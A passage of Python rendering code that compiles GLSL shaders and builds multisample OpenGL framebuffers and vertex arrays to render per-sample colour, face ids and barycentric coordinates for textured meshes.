#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
//layout(early_fragment_tests) in;
// Interpolated values from the vertex shaders
in vec3 theColor;
in vec2 UV;
flat in uint face_out;
in vec4 pos;
in vec3 barycentric_vert_out;
layout(location = 3) uniform sampler2D myTextureSampler;
uniform float ww;
uniform float wh;
// Output data
layout(location = 0) out vec3 color;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 barycentric1;
layout(location = 4) out vec2 barycentric2;
void main(){
vec3 finalColor = theColor * texture( myTextureSampler, UV ).rgb;
color = finalColor.rgb;
sample_pos = ((0.5*pos.xy/pos.w) + 0.5)*vec2(ww,wh);
sample_face = face_out;
barycentric1 = barycentric_vert_out.xy;
barycentric2 = vec2(barycentric_vert_out.z, 0.);
}""", GL.GL_FRAGMENT_SHADER)
self.errorTextureProgram = shaders.compileProgram(VERTEX_SHADER, ERRORS_FRAGMENT_SHADER)
FETCH_VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
void main() {}
""", GL.GL_VERTEX_SHADER)
FETCH_GEOMETRY_SHADER = shaders.compileShader("""#version 330 core
layout(points) in;
layout(triangle_strip, max_vertices = 4) out;
const vec2 data[4] = vec2[]
(
vec2(-1.0, 1.0),
vec2(-1.0, -1.0),
vec2( 1.0, 1.0),
vec2( 1.0, -1.0)
);
void main() {
for (int i = 0; i < 4; ++i) {
gl_Position = vec4( data[i], 0.0, 1.0 );
EmitVertex();
}
EndPrimitive();
}""", GL.GL_GEOMETRY_SHADER)
FETCH_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
layout(location = 2) uniform sampler2DMS colors;
layout(location = 3) uniform sampler2DMS sample_positions;
layout(location = 4) uniform usampler2DMS sample_faces;
layout(location = 5) uniform sampler2DMS sample_barycentric_coords1;
layout(location = 6) uniform sampler2DMS sample_barycentric_coords2;
uniform float ww;
uniform float wh;
uniform int sample;
// Output data
layout(location = 0) out vec3 colorFetchOut;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 sample_barycentric1;
layout(location = 4) out vec2 sample_barycentric2;
//out int gl_SampleMask[];
const int all_sample_mask = 0xffff;
void main(){
ivec2 texcoord = ivec2(gl_FragCoord.xy);
colorFetchOut = texelFetch(colors, texcoord, sample).xyz;
sample_pos = texelFetch(sample_positions, texcoord, sample).xy;
sample_face = texelFetch(sample_faces, texcoord, sample).r;
sample_barycentric1 = texelFetch(sample_barycentric_coords1, texcoord, sample).xy;
sample_barycentric2 = texelFetch(sample_barycentric_coords2, texcoord, sample).xy;
}""", GL.GL_FRAGMENT_SHADER)
GL.glClampColor(GL.GL_CLAMP_READ_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_VERTEX_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_FRAGMENT_COLOR, False)
self.fetchSamplesProgram = shaders.compileProgram(FETCH_VERTEX_SHADER, FETCH_GEOMETRY_SHADER, FETCH_FRAGMENT_SHADER)
self.textureGT = GL.GLuint(0)
# GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glGenTextures(1, self.textureGT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
# self.textureGTLoc = GL.glGetUniformLocation(self.errorTextureProgram, "imageGT")
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# #
# try:
# if self.imageGT.r is not None and self.imageGT.r.size != 0: #if GT image is defined.
# image = np.array(np.flipud((self.imageGT.r)), order='C', dtype=np.float32)
# GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# except:
# pass
# GL.glGenTextures(1, self.textureEdges)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureEdges)
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# GL.glActiveTexture(GL.GL_TEXTURE0)
whitePixel = np.ones([1,1,3])
self.whitePixelTextureID = GL.GLuint(0)
GL.glGenTextures( 1, self.whitePixelTextureID )
GL.glBindTexture(GL.GL_TEXTURE_2D, self.whitePixelTextureID)
image = np.array(np.flipud((whitePixel)), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
self.fbo_ms_errors = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_ms_errors)
self.texture_errors_render = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RGB8, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
self.texture_errors_sample_position = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
self.texture_errors_sample_faces = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_R32UI, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces, 0)
#
self.texture_errors_sample_barycentric1 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1, 0)
self.texture_errors_sample_barycentric2 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2, 0)
self.z_buf_ms_errors = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors, 0)
# self.z_buf_ms_errors = GL.glGenRenderbuffers(1)
# GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
# GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
# GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
status = GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)
print("FRAMEBUFFER ERR: " + str(status))
assert status == GL.GL_FRAMEBUFFER_COMPLETE
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.fbo_sample_fetch = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_sample_fetch)
self.render_buffer_fetch_sample_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
self.render_buffer_fetch_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
self.render_buffer_fetch_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
#
self.render_buffer_fetch_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
self.render_buffer_fetch_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
self.z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
status = GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)
print("FRAMEBUFFER ERR: " + str(status))
assert status == GL.GL_FRAMEBUFFER_COMPLETE
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
#FBO_f
self.fbo_errors_nonms = GL.glGenFramebuffers(1)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_errors_nonms)
render_buf_errors_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, render_buf_errors_render)
render_buf_errors_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
render_buf_errors_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
#
render_buf_errors_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
render_buf_errors_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
#
z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
status = GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)
print("FRAMEBUFFER ERR: " + str(status))
assert status == GL.GL_FRAMEBUFFER_COMPLETE
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.textureObjLoc = GL.glGetUniformLocation(self.errorTextureProgram, "myTextureSampler")
#Add background cube:
position_location = GL.glGetAttribLocation(self.errorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.errorTextureProgram, 'colorIn')
uvs_location = GL.glGetAttribLocation(self.errorTextureProgram, 'vertexUV')
face_ids_location = GL.glGetAttribLocation(self.errorTextureProgram, 'face_id')
barycentric_location = GL.glGetAttribLocation(self.errorTextureProgram, 'barycentric')
# self.vbo_verts_cube= vbo.VBO(np.array(self.v_bgCube).astype(np.float32))
# self.vbo_colors_cube= vbo.VBO(np.array(self.vc_bgCube).astype(np.float32))
# self.vbo_uvs_cube = vbo.VBO(np.array(self.ft_bgCube).astype(np.float32))
# self.vao_bgCube = GL.GLuint(0)
# GL.glGenVertexArrays(1, self.vao_bgCube)
#
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube = vbo.VBO(np.array(self.f_bgCube).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
# self.vbo_f_bgCube.bind()
# self.vbo_verts_cube.bind()
# GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_colors_cube.bind()
# GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_uvs_cube.bind()
# GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#
# f = self.f_bgCube
# fc = np.tile(np.arange(len(self.f), len(self.f) + len(f))[:, None], [1, 3]).ravel()
# # fc[:, 0] = fc[:, 0] & 255
# # fc[:, 1] = (fc[:, 1] >> 8) & 255
# # fc[:, 2] = (fc[:, 2] >> 16) & 255
# fc = np.asarray(fc, dtype=np.uint32)
# vbo_face_ids_cube = vbo.VBO(fc)
# vbo_face_ids_cube.bind()
# GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
# GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
#
# #Barycentric cube:
# f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
# vbo_barycentric_cube = vbo.VBO(f_barycentric)
# vbo_barycentric_cube.bind()
# GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_quad = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_quad)
GL.glBindVertexArray(self.vao_quad)
#Bind VAO
self.vbo_face_ids_list = []
self.vbo_barycentric_list = []
self.vao_errors_mesh_list = []
flen = 1  # face ids start at 1; 0 is reserved for "no face"/background samples
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_face_ids_mesh = []
vbo_barycentric_mesh = []
for polygons in np.arange(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_f.bind()
vbo_verts = self.vbo_verts_mesh[mesh][polygons]
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors = self.vbo_colors_mesh[mesh][polygons]
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_uvs = self.vbo_uvs_mesh[mesh][polygons]
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
f = self.f_list[mesh][polygons]
fc = np.tile(np.arange(flen, flen + len(f))[:,None], [1,3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
vbo_face_ids = vbo.VBO(fc)
vbo_face_ids.bind()
GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
vbo_barycentric = vbo.VBO(f_barycentric)
vbo_barycentric.bind()
GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
flen += len(f)
vaos_mesh += [vao]
vbo_face_ids_mesh += [vbo_face_ids]
vbo_barycentric_mesh += [vbo_barycentric]
GL.glBindVertexArray(0)
self.vbo_face_ids_list += [vbo_face_ids_mesh]
self.vbo_barycentric_list += [vbo_barycentric_mesh]
self.vao_errors_mesh_list += [vaos_mesh]
def render_image_buffers(self):
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
self.makeCurrentContext()
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1%self.num_channels], self.bgcolor.r[2%self.num_channels], 1.)
GL.glUseProgram(self.errorTextureProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3, GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
# GL.glClearBufferiv(GL.GL_COLOR, 0, 0)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
wwLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
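# Note: MVP = Projection * View. glUniformMatrix4fv is called below with
# transpose=GL_TRUE because numpy stores matrices row-major, while GLSL
# uniforms expect column-major storage.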
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_errors_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
# vbo_color.bind()
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
assert(primtype == GL.GL_TRIANGLES)
# GL.glUseProgram(self.errorTextureProgram)
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
else:
texture = self.whitePixelTextureID
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureObjLoc, 0)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f)*vbo_f.data.shape[1])
# # #Background cube:
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube.bind()
# texture = self.whitePixelTextureID
# self.vbo_uvs_cube.bind()
#
# GL.glActiveTexture(GL.GL_TEXTURE0)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# GL.glUniform1i(self.textureObjLoc, 0)
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube)*self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
# self.draw_visibility_image_ms(self.v, self.f)
# GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# # result_blit = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# result_blit2 = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT1)
